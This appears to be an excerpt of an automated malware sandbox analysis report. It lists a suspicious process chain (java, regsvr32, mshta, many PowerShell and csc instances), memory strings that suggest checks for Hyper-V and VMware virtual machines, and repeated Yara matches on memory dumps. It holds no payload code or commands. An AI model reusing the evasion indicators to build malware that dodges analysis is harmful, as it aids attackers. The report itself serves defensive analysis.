File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |
Source: C:\Windows\SysWOW64\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK |
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp |
Binary or memory string: ,java/lang/VirtualMachineError |
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp |
Binary or memory string: |[Ljava/lang/VirtualMachineError; |
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: org/omg/CORBA/OMGVMCID.classPK |
Source: regsvr32.exe, 00000006.00000003.900452153.0000000002EA8000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW |
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: java/lang/VirtualMachineError.classPK |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: mshta.exe, 00000011.00000003.815205220.000002CF91D0F000.00000004.00000001.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: java.exe, 00000002.00000002.681160126.000000000078B000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |